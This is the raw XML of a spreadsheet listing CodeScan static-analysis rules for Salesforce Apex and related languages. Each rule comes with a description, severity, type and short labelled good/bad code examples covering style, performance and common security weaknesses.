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0"/>
  <workbookPr defaultThemeVersion="166925"/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="https://autora-my.sharepoint.com/personal/harish_thadandla_autorabit_com/Documents/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="11" documentId="8_{51AB6026-A458-0841-AC08-D1BE41E6F1D4}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{260A82C1-2F5F-4C2A-8660-CC6FD3CC9D22}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="740" windowWidth="29400" windowHeight="16980" tabRatio="748" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="CodeScan Rule List" sheetId="1" r:id="rId1"/>
    <sheet name="apex" sheetId="9" r:id="rId2"/>
    <sheet name="vf and lightning" sheetId="10" r:id="rId3"/>
    <sheet name="javascript(cs)" sheetId="11" r:id="rId4"/>
    <sheet name="javascript(sonar)" sheetId="12" r:id="rId5"/>
    <sheet name="security hotspots (apex)" sheetId="6" r:id="rId6"/>
    <sheet name="security hotspots (vf and l)" sheetId="7" r:id="rId7"/>
    <sheet name="Salesforcemetadata" sheetId="13"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1" l="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="4747" uniqueCount="2225">
  <si>
    <t>This is a complete list of Apex, Visualforce , Javascript and Salesforce Metadata rules used by CodeScan as of May 2024</t>
  </si>
  <si>
    <t>The versions used are as follows:</t>
  </si>
  <si>
    <t>CodeScan: 24.0.5</t>
  </si>
  <si>
    <t>SonarJS:  6.2+</t>
  </si>
  <si>
    <t>SonarQube™ 8.9+</t>
  </si>
  <si>
    <t>The current rule count is:</t>
  </si>
  <si>
    <t>Apex-261</t>
  </si>
  <si>
    <t>VF &amp; Lightening- 104</t>
  </si>
  <si>
    <t>javascript (CS)- 53</t>
  </si>
  <si>
    <t>javascript (Sonar)- 269</t>
  </si>
  <si>
    <t>security hotspots (apex)- 5</t>
  </si>
  <si>
    <t>security hotspots (vf and l)- 1</t>
  </si>
  <si>
    <t>salesforce metadata- 82</t>
  </si>
  <si>
    <t>The current hotspot count is:</t>
  </si>
  <si>
    <t>This number includes Apex, Visualforce and Javascript rules (including SonarJS)</t>
  </si>
  <si>
    <t>CodeScan: 24.0.4</t>
  </si>
  <si>
    <t>Cloud only</t>
  </si>
  <si>
    <t>Rules_key</t>
  </si>
  <si>
    <t>sfmeta:CustomProfilesPermission</t>
  </si>
  <si>
    <t>sfmeta:ExcessivePageLayout</t>
  </si>
  <si>
    <t>sfmeta:LimitCustomFields</t>
  </si>
  <si>
    <t>sfmeta:CheckSystemAdministrator</t>
  </si>
  <si>
    <t>These lists do not reflect the number of rules in the default Quality Profiles.</t>
  </si>
  <si>
    <t>Default Quality Profiles may or may not contain all rules available and are given as a recommended minimum.</t>
  </si>
  <si>
    <t>Quality profiles should be customised for your organisation's standards and needs.</t>
  </si>
  <si>
    <t>APEX RULES</t>
  </si>
  <si>
    <t>rules_key</t>
  </si>
  <si>
    <t>rules_name</t>
  </si>
  <si>
    <t>rules_mdDesc</t>
  </si>
  <si>
    <t>rules_severity</t>
  </si>
  <si>
    <t>rules_langName</t>
  </si>
  <si>
    <t>rules_type</t>
  </si>
  <si>
    <t>nCino Specific</t>
  </si>
  <si>
    <t>sf:AvoidGlobalModifier</t>
  </si>
  <si>
    <t>Avoid Using Global Modifier</t>
  </si>
  <si>
    <t>Global classes should be avoided (especially in managed packages) as they can never be deleted
      or changed in signature. Always check twice if something needs to be global. Many interfaces 
      (e.g. Batch, Schedulable, WebServiceMock, HttpCalloutMock) required global modifiers in the past
      but donâ€™t require this anymore. Donâ€™t lock yourself in.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
global class JobSyncScheduler implements Schedulable {	//Bad: Schedulable doesn't need to be global anymore.
     global void execute(SchedulableContext context){
    }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>MINOR</t>
  </si>
  <si>
    <t>APEX</t>
  </si>
  <si>
    <t>CODE_SMELL</t>
  </si>
  <si>
    <t>sf:TrackSuppressWarnings</t>
  </si>
  <si>
    <t>Track Usage of @SuppressWarnings</t>
  </si>
  <si>
    <t>Overuse of the @SupressWarnings annotation can mean issues in your code are not picked up.  This rule flags each usage to make sure it is needed.
  See &lt;a href="https://docs.codescan.io/hc/en-us/articles/360012109711-Ignoring-violations"&gt;docs.codescan.io&lt;/a&gt; for more information.
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
@SuppressWarnings('all')
public class Foo {
  // The class will be ignored.
}
  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>INFO</t>
  </si>
  <si>
    <t>sf:OutboundEmailSend</t>
  </si>
  <si>
    <t>Sending outbound emails using Messaging.sendEmail</t>
  </si>
  <si>
    <t>Single/Mass email messages sent with the Messaging.sendEmail method count against the sending organization's daily email limits. When this limit is reached, calls to the sendEmail method will be rejected and the user will receive an error.
It's up to the developer to review the code to determine whether or not a fix is needed.
&lt;br/&gt;
Read more here:  &lt;a href ="https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/apex_gov_limits.htm"&gt;Execution Governors and Limits&lt;/a&gt;
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
      Messaging.SingleEmailMessage mail = new Messaging.SingleEmailMessage();
      mail.setSubject('Hello team');
      mail.setToAddresses(new String[] {'test@codescan.io'});
      mail.setHTMLBody('Testing my email');
      Messaging.sendEmail(new Messaging.SingleEmailMessage[] { mail }); //Bad: Sending outbound emails using Messaging.sendEmail.
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidOutboundCallsInBatchApex</t>
  </si>
  <si>
    <t>Using Database.AllowsCallouts interface in Batch Apex.</t>
  </si>
  <si>
    <t>Avoid using the Database.AllowsCallouts interface in your Batch Apex classes as it is not recommended to make HTTP calls as part of your Batch Apex logic.
&lt;br/&gt;
Consider using an ETL (extract, transform and load) tools if you're interested in integrating data from other services with Salesforce.
&lt;br/&gt;
More about Batch Apex here: &lt;a href ="https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/apex_batch_interface.htm"&gt;Salesforce Developers - Using Batch Apex&lt;/a&gt;
&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
global class ProcessTestResult implements Database.Batchable, Database.AllowsCallouts //Bad: Using the Database.AllowsCallouts together with Database.Batchable.
{
  global List start(Database.BatchableContext bc)
  {
    return getQueuedItems();
  }
  global void execute(Database.BatchableContext BC, List queuedItemsList)
  {
    processResults(queuedItemsList);
  }
  global void finish(Database.BatchableContext BC)
  {
  }
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidHardCodedError</t>
  </si>
  <si>
    <t>Avoid Hard Coded Error Messages</t>
  </si>
  <si>
    <t>Error messages that are passed to the client should use custom labels or be set dynamically through method calls. This allows the message to be translated and modified more easily
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	public void triggerHandler(){
    	obj.addError('An error occurred', true); //Bad: hard coded error
    	Trigger.new[0].addError(System.Label.Label_name + bad, false); // Bad: Label is concatenated with a variable.
    	obj.addError(System.label.errorOccurred); //Good: Custom label
      throw new AuraHandledException(System.Label.Label_name + bad); //Bad: hard coded error
    }
}
public class MySampleApexClass {
   public static Integer myValue = 0;
   public static Integer getCalculatedValue () {
        try {
            myValue = 10;
            return myValue;
        } catch (HandledException e) {
           throw new AuraHandledException(e.getMessage()); //Good: Dynamic Error Message
        } catch (AssertException ae) {
           String errMsg = ae.getMessage();
           throw new AuraHandledException(errMsg); // Bad: Using a variable to store error message is unnecessary.
        } catch ( StringException se) {
        // Good: String concatenation with dynamic error message is allowed.
        throw new AuraHandledException('Exception: ' + se.getError());
        }
   }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>MAJOR</t>
  </si>
  <si>
    <t>sf:ExceptionClassNaming</t>
  </si>
  <si>
    <t>Exception Class Naming</t>
  </si>
  <si>
    <t>A Class name that extends an exception should have a name that ends in "Exception".
		&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class MyClass extends Exception { //Bad: we would expect this class name to end in 'Exception'.
}
public class MyException extends Exception { //Good: this is preferred.
}
		&lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:LeftBracesLinePositions</t>
  </si>
  <si>
    <t>Left Braces Positioning Should Be Consistent</t>
  </si>
  <si>
    <t>The line positioning of opening braces should remain consistent throughout the project. 
The rule has separate parameters for classes, triggers, methods, blocks and accessors.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo{
	public void test1()		// This is an example of the opening brace on the next line. (methodBracesPosition parameter set to Next)
	{
	}
}
public class Foo{
	public void test1(){    // This is an example of the opening brace on the same line. (methodBracesPosition parameter set to Same)
	}
}
       &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ClassWithoutTestClass</t>
  </si>
  <si>
    <t>Class Without Test Class</t>
  </si>
  <si>
    <t>Every Class should have a corresponding Test Class which is named appropriately.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
MyClass.cls 
-------------
public without sharing class MyClass{ //code...}   //For each class...
MyClassTest.cls 
-------------
@isTest
public class MyClassTest{
    static testMethod void GoodTest(){ //code...}    //...there should be an appropriately named test class.
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:XPathRule</t>
  </si>
  <si>
    <t>XPath rule template</t>
  </si>
  <si>
    <t>CodeScan provides a very handy method for creating new rules by writing an XPath query. When the XPath query finds a match, a violation is created.
    Let's take a simple example : assume we have a Factory class that must be always declared final. 
    We'd like to report a violation each time a declaration of Factory is not declared final. Consider the following class: :
&lt;pre&gt;
public class a {
  Factory f1;
  void myMethod() {
    Factory f2;
    Integer a;
  }
}
&lt;/pre&gt;
  The following expression does the magic we need:
&lt;pre&gt;
//VariableDeclarator
 [../Type/ReferenceType/ClassOrInterfaceType
  [@Image = 'Factory'] and ..[@Final='false']]
&lt;/pre&gt;
  See our &lt;a href="https://knowledgebase.autorabit.com/codescan/docs/creating-custom-rules-with-xpath-for-codescan-cloud/"&gt;Custom Rules tutorial&lt;/a&gt; for more information.</t>
  </si>
  <si>
    <t>sf:AvoidForLoopToJustAddElementsToCollection</t>
  </si>
  <si>
    <t>Avoid For Loop To Just Add Elements To A Collection</t>
  </si>
  <si>
    <t>The method .addAll should be used to add all elements from one collection to another.  Using a for loop is unnecessary.&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
 public class Foo{
   List&lt;String&gt; listOne;
   List&lt;String&gt; listTwo;
   public Foo(){
     listOne; = new List &lt;String&gt;();
     listTwo; = new List &lt;String&gt;();
     listOne.add('one');
     listOne.add('two');
     listTwo.add('A');
     listTwo.add('B');
   }
   public void badCombine(){
     for(String item : listOne)        //Bad: This is unnecessary.
       listTwo.add(item);
   }
   public void goodCombine(){
     listOne.addAll(listTwo);        //Good: This is preferred.
 }
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:VariableDeclarationHidesAnother</t>
  </si>
  <si>
    <t>Avoid declarations hiding another field or variable</t>
  </si>
  <si>
    <t>One variable can hide another if they have the same name and are accessible in the same place.  Consider renaming the variable.    
&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	integer x;
	public void asdf(){
		integer x = 0;      //Bad: The variable x defined as a field will be hidden.
	}
}
public class Foo {
	integer x;
	public void asdf(){
		integer y = 0;      //Good: Distinct naming is preferred.
	}
}
        &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:FailedUnitTest</t>
  </si>
  <si>
    <t>Failing Unit Tests</t>
  </si>
  <si>
    <t>This rule tracks failing unit tests and reports them as violations.</t>
  </si>
  <si>
    <t>sf:CouplingBetweenObjects</t>
  </si>
  <si>
    <t>Coupling Between Objects</t>
  </si>
  <si>
    <t>This rule counts the number of unique attributes, local variables, and return types within an object. 
A number higher than the specified threshold can indicate a high degree of coupling.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
   private Blah var1;
   private Bar var2;
 	// ....followed by many imports of unique objects
   void ObjectC doWork() {
     Bardo var55;
     ObjectA var44;
     ObjectZ var93;
     return something;  //Bad: This is not recommended. Could indicate a high degree of coupling.
   }
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ExcessivePublicCount</t>
  </si>
  <si>
    <t>Excessive Public Count</t>
  </si>
  <si>
    <t>Classes with large numbers of public methods and attributes require disproportionate testing efforts
since combinational side effects grow rapidly and increase risk. Refactoring these classes into
smaller ones not only increases testability and reliability but also allows new variations to be
developed easily.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	public String value;
	public Bar something;
	public Variable var;
 // [... more more public attributes ...]
	public void doWork() {}
	public void doMoreWork() {}
	public void doWorkAgain() {}
 // [... more more public methods ...]
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidSoqlInLoops</t>
  </si>
  <si>
    <t>Avoid Calling SOQL and DML Inside Loops.</t>
  </si>
  <si>
    <t>Soql and DML calls within loops can cause governor limit exceptions.
Merge DML is ignored, as there is currently no bulkified way of merging.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Something {
	public static void main( String as[] ) {  
		for (Integer i = 0; i &lt; 10; i++) {
		  Id name = [ Select Id From Contact Where Name='Sam'; //Bad: avoid this whenever you can, it's really expensive.
		}
	}
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:LongMethodName</t>
  </si>
  <si>
    <t>Long Method Name</t>
  </si>
  <si>
    <t>Method names that are too long can make the code difficult to follow.
     &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class LongMethod {
  public void thisIsSomeReallyLongMethodName() { //Bad: The method name is too long.
  }
}
     &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:LongClassName</t>
  </si>
  <si>
    <t>Long Class Name</t>
  </si>
  <si>
    <t>Class names that are too long can make the code difficult to follow. Salesforce Developer Console restricts users from
creating an Apex Class with class name greater than 40 characters.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class AnExcessivelyLongApexClassNameAsNegativeExample {  //Bad: this is not recommended.
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UncommentedEmptyConstructor</t>
  </si>
  <si>
    <t>Uncommented Empty Constructor</t>
  </si>
  <si>
    <t>Uncommented Empty Constructor finds instances where a constructor does not
contain statements, but there is no comment. By explicitly commenting empty
constructors it is easier to distinguish between intentional (commented)
and unintentional empty constructors.
Comments can be added inside the constructor or a formal comment (/** comment */) above the constructor is also valid
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public Foo() { 			//Bad: Consider commenting this constructor.
  super();
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AuraEnabledWithoutCatchBlock</t>
  </si>
  <si>
    <t>@AuraEnabled should have Proper Error Handling</t>
  </si>
  <si>
    <t>@AuraEnabled actions require error handling and should throw AuraHandledException&lt;br/&gt;
      Wrap the code that can trigger exceptions in a try-catch block.
      Throw an AuraHandledException in the catch block. This allows you to provide a custom user-friendly error message.
      &lt;br/&gt;
      See &lt;a href="https://developer.salesforce.com/blogs/2017/09/error-handling-best-practices-lightning-apex.html"&gt;https://developer.salesforce.com/blogs/2017/09/error-handling-best-practices-lightning-apex.html&lt;/a&gt; 
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class FooController {					//Good: Try catch block in place.
	@AuraEnabled public void getSomething() {
		try{
			...
		}catch(Exception e){
			throw new AuraHandledException(e.getMessage());
		}
	}		
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>common-sf:InsufficientBranchCoverage</t>
  </si>
  <si>
    <t>Branches should have sufficient coverage by tests</t>
  </si>
  <si>
    <t>An issue is created on a file as soon as the branch coverage on this file is less than the required threshold. It gives the number of branches to be covered in order to reach the required threshold.</t>
  </si>
  <si>
    <t>common-sf:InsufficientLineCoverage</t>
  </si>
  <si>
    <t>Lines should have sufficient coverage by tests</t>
  </si>
  <si>
    <t>An issue is created on a file as soon as the line coverage on this file is less than the required threshold. It gives the number of lines to be covered in order to reach the required threshold.</t>
  </si>
  <si>
    <t>common-sf:InsufficientCommentDensity</t>
  </si>
  <si>
    <t>Source files should have a sufficient density of comment lines</t>
  </si>
  <si>
    <t>An issue is created on a file as soon as the density of comment lines on this file is less than the required threshold. The number of comment lines to be written in order to reach the required threshold is provided by each issue message.</t>
  </si>
  <si>
    <t>common-sf:DuplicatedBlocks</t>
  </si>
  <si>
    <t>Source files should not have any duplicated blocks</t>
  </si>
  <si>
    <t>An issue is created on a file as soon as there is at least one block of duplicated code on this file</t>
  </si>
  <si>
    <t>common-sf:SkippedUnitTests</t>
  </si>
  <si>
    <t>Skipped unit tests should be either removed or fixed</t>
  </si>
  <si>
    <t>Skipped unit tests are considered as dead code. Either they should be activated again (and updated) or they should be removed.</t>
  </si>
  <si>
    <t>common-sf:FailedUnitTests</t>
  </si>
  <si>
    <t>Failed unit tests should be fixed</t>
  </si>
  <si>
    <t>Test failures or errors generally indicate that regressions have been introduced. Those tests should be handled as soon as possible to reduce the cost to fix the corresponding regressions.</t>
  </si>
  <si>
    <t>BUG</t>
  </si>
  <si>
    <t>sf:AvoidSizeOfSoql</t>
  </si>
  <si>
    <t>Avoid Calling sizeOf on a SOQL Statement.</t>
  </si>
  <si>
    <t>It's better to use an aggregate call like select COUNT() from table. This rule is not applied to test methods.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Something {
	public static void main( String as[] ) {  
		integer size = [ select id from table ].size();  //Bad: this is not recommended.
		integer size = [ select count() from table ]; 	//Good: this is preferred.
	}
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AbstractClassWithoutAnyMethod</t>
  </si>
  <si>
    <t>Abstract Class without any Methods</t>
  </si>
  <si>
    <t>If an abstract class does not provide any methods, it may be acting as a simple data container 
that is not meant to be instantiated. In this case, it is probably better to use a private or 
protected constructor in order to prevent instantiation than make the class misleadingly abstract.
	   &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
//Bad: data only container?
public class abstract Example {
	String field;
	Integer otherField;
}
//Good: data container class is protected against instantiation.
public class Example {
	String field;
	Integer otherField;
	protected Example(){	
		//protected so that instantiation is not possible
	}
}
        &lt;/pre&gt;</t>
  </si>
  <si>
    <t>BLOCKER</t>
  </si>
  <si>
    <t>sf:AvoidMethodsBeforeInitializers</t>
  </si>
  <si>
    <t>Avoid Calling Methods before Initializers in Constructors</t>
  </si>
  <si>
    <t>Local variables should be initialized before calling other methods in the class. Since the constructor may not be fully initialized, the methods may fail due to the state of the object.
    	&lt;br/&gt;
    	If you need to run a method, try to initialize all variables first.
    	&lt;br/&gt;
    	Note that an implemented accessors (e.g. integer a { get { ... return something } }) is counted as a method as it can also rely on other variables
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  private String status;
  public Foo(String status){
	if ( getStatus() == 'something' ){		//Bad: this would fail, as the constructor has not completely initialized the object yet.
		// ...
	}
	this.status = status;
  }
  public String getStatus(){
  	return this.status;
  }
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidSoqlWithNegativeLogic</t>
  </si>
  <si>
    <t>Avoid Calling SOQL with Negative Expressions.</t>
  </si>
  <si>
    <t>When working with very large amounts of data, SOQL calls using negative expressions cannot use an index and may be slow.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Something {
	public static void main( String as[] ) {  
		Account[] accs = [ select id from account where field__c != 123 ];  //Bad: this is not recommended.
	}
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AbstractClassWithoutAbstractMethod</t>
  </si>
  <si>
    <t>Abstract Class Without Abstract Method</t>
  </si>
  <si>
    <t>The abstract class does not contain any abstract methods. An abstract class suggests
an incomplete implementation, which is to be completed by subclasses implementing the
abstract methods. If the class is intended to be used as a base class only (not to be instantiated
directly) a protected constructor can be provided prevent direct instantiation.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public abstract class Foo {			//Bad: Consider using abstract methods or removing
  									// the abstract modifier and adding protected constructors
  void Integer method1() { ... }
  void Integer method2() { ... }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:InsecureEndpoint</t>
  </si>
  <si>
    <t>Avoid Cleartext Transmission of Sensitive Information</t>
  </si>
  <si>
    <t>Checks against accessing endpoints under plain **http**. You should always use **https** for security.&lt;br/&gt;
Many communication channels can be "sniffed" by attackers during data transmission. For example, network traffic can often be sniffed by any attacker who has access to a network interface. This significantly lowers the difficulty of exploitation by attackers.&lt;br/&gt;
&lt;br/&gt;
See &lt;a href="http://cwe.mitre.org/data/definitions/319.html"&gt;MITRE, CWE-319&lt;/a&gt; - Cleartext Transmission of Sensitive Information
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	void foo() {
		String endpoint = 'http://localhost:3300';
		HttpRequest req = new HttpRequest();
		req.setEndpoint(endpoint);
	}
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>CRITICAL</t>
  </si>
  <si>
    <t>VULNERABILITY</t>
  </si>
  <si>
    <t>sf:SystemDebug</t>
  </si>
  <si>
    <t>Avoid calling System.debug()</t>
  </si>
  <si>
    <t>References to System.debug are usually intended for debugging purposes and can remain in
the codebase even in production code.&lt;br/&gt;
&lt;br/&gt;
This is a potential privacy violation as usernames, passwords, names, contact information, opportunity information, PII and other sensitive data may be stored in unsecured locations or is accessible by unauthorized users.&lt;br/&gt;
&lt;br/&gt;
This rule can also be set to 'Strict' to disallow all use of System.debug.&lt;br/&gt;
&lt;br/&gt;
Debug logs may be downloaded and sent to a 3rd party by emails or other means as part of reporting possible errors.&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://cwe.mitre.org/data/definitions/489.html"&gt;MITRE, CWE-489&lt;/a&gt; - Leftover Debug Code&lt;/li&gt;
&lt;li&gt;OWASP Top 10 2021 Category A2 - Cryptographic Failures&lt;/li&gt;
&lt;/ul&gt;
     &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
class Foo{
    public void testA () {
        System.debug('Entering test');   //Bad: Consider removing this.
    }
}
     &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:LongTriggerName</t>
  </si>
  <si>
    <t>Long Trigger Name</t>
  </si>
  <si>
    <t>Trigger names that are too long can make the code difficult to follow.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
trigger AnExcessivelyLongTriggerNameAsNegativeExample on Account (before insert) { //Bad: this is not recommended.
System.debug('Hello World!');
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:CommentedTodo</t>
  </si>
  <si>
    <t>Avoid leaving TODO/FIXME comments in code</t>
  </si>
  <si>
    <t>TODO/FIXME's should either be resolved. 
See also - &lt;a href="http://cwe.mitre.org/data/definitions/546.html"&gt;MITRE, CWE-546&lt;/a&gt;
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
/*      
* TODO: this would be much better if we did it without bugs...   		//Bad: Resolve this before committing!
* FIXME: this would be much better if we did it without bugs...   		//Bad: Resolve this before committing!
*/     
  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:CommentRequired</t>
  </si>
  <si>
    <t>Comment is Required</t>
  </si>
  <si>
    <t>Denotes whether comments are required (or unwanted) for specific language elements.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
/**
* 
*
* @author John Doe
*/
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:Csrf</t>
  </si>
  <si>
    <t>Avoid Making DML Operations in Controller Constructor/Action Method</t>
  </si>
  <si>
    <t>Check to avoid making DML operations in Apex class constructor/action method. This prevents
modification of the database just by accessing a page.&lt;br/&gt;
&lt;br/&gt;
When a web server is designed to receive a request from a client without any mechanism for verifying that 
it was intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional 
request to the web server which will be treated as an authentic request. This can be done via a URL, image load, 
XMLHttpRequest, etc. and can result in exposure of data or unintended code execution.&lt;br/&gt;
&lt;br/&gt;
See &lt;a href="http://cwe.mitre.org/data/definitions/352.html"&gt;MITRE, CWE-352&lt;/a&gt; - Cross-Site Request Forgery (CSRF)
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class FooController {
	public FooController() {
		Account data = new Account({'name': 'New data'});  //Bad: not recommended.
		insert data;
	}
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:EmptyCatchBlock</t>
  </si>
  <si>
    <t>Empty Catch Block</t>
  </si>
  <si>
    <t>Empty Catch Block finds instances where an exception is caught, but nothing is done.  
In most circumstances, this swallows an exception which should either be acted on 
or reported.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public void doSomething() {
  try {
    doHeapsOfStuff();
  } catch (Exception e) {									//Bad: Not recommmended.
  }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:EmailAddressInLiteral</t>
  </si>
  <si>
    <t>Hard Coded Email Address</t>
  </si>
  <si>
    <t>Avoid hardcoded email addresses.</t>
  </si>
  <si>
    <t>sf:BrokenNullCheck</t>
  </si>
  <si>
    <t>Broken Null Check</t>
  </si>
  <si>
    <t>The null check is broken since it will throw a NullPointerException itself.
It is likely that you used || instead of &amp;&amp; or vice versa.
     &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public String bar(String string) { 
	if (string != null || !string.equals('')){	//Bad: Should be &amp;&amp;. The !string.equals statement will throw an exception if the string is null.
		return string;
	}
	if (string == null &amp;&amp; string.equals('')){	//Bad: Should be ||. The &amp;&amp; operator will cause the string.equals('') to throw an exception.
		return string;
	}
}
        &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidLosingExceptionInformation</t>
  </si>
  <si>
    <t>Avoid Losing Exception Information</t>
  </si>
  <si>
    <t>Statements in a catch block that invoke accessors on the exception without using the information
only add to code size.  Either remove the invocation, or use the return result.
		&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public void bar() {
	try {
		// do something
	} catch (SomeException se) {
		se.getMessage();  	//Bad: this is not recommended.
	}
}
		&lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidLogicInTrigger</t>
  </si>
  <si>
    <t>Avoid Logic in Triggers</t>
  </si>
  <si>
    <t>As triggers do not allow methods like regular classes they are less flexible and suited to apply good encapsulation style. Therefore delegate the triggers work to a regular class (often called Trigger handler class). 
The exception to this rule is you may check the Trigger.is* context (Trigger.isInsert for example) inside an if statement.
&lt;br/&gt;
Read more here: &lt;a href ="https://developer.salesforce.com/page/Trigger_Frameworks_and_Apex_Trigger_Best_Practices"&gt;https://developer.salesforce.com/page/Trigger_Frameworks_and_Apex_Trigger_Best_Practices&lt;/a&gt;
     &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
trigger OpportunityTrigger on Opportunity (after insert, after update) {
  //allowed - trigger context handler logic
  if(Trigger.isAfter &amp;&amp; Trigger.isInsert) {
    OpportunityTriggerHandler.handleAfterInsert(Trigger.new);
  } else if(Trigger.isAfter &amp;&amp; Trigger.isUpdate) {
    OpportunityTriggerHandler.handleAfterInsert(Trigger.new, Trigger.old);
  }
  new OpportunityTriggerHandler.run();		 //Good: this is trigger context handler logic.
  for(Account a : Trigger.new){           	//Bad: this is not recommended.
		//...
   }
}
     &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidMultipleUnaryOperators</t>
  </si>
  <si>
    <t>Avoid Multiple Unary Operators</t>
  </si>
  <si>
    <t>The use of multiple unary operators may be problematic, and/or confusing.
Ensure that the intended usage is not a bug, or consider simplifying the expression.
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
//Bad: These are typo bugs, or at best needlessly complex and confusing.  
Integer i = - -1;
Integer j = + - +1;
Integer z = ~~2;
boolean b = !!true;
boolean c = !!!true;
//Good: These are better.
Integer i = 1;
Integer j = -1;
Integer z = 2;
boolean b = true;
boolean c = false;
// And these just make your brain hurt:
Integer i = ~-2;
Integer j = -~7;
        &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidInsecureCookies</t>
  </si>
  <si>
    <t>Avoid Creating Cookies with isSecure Disabled</t>
  </si>
  <si>
    <t>The isSecure parameter indicates whether the cookie can be accessed through HTTPS. 
&lt;br/&gt;
By setting isSecure=false, sensitive cookies may be exposed when sending the cookie over an unsecure connection.
&lt;br/&gt;
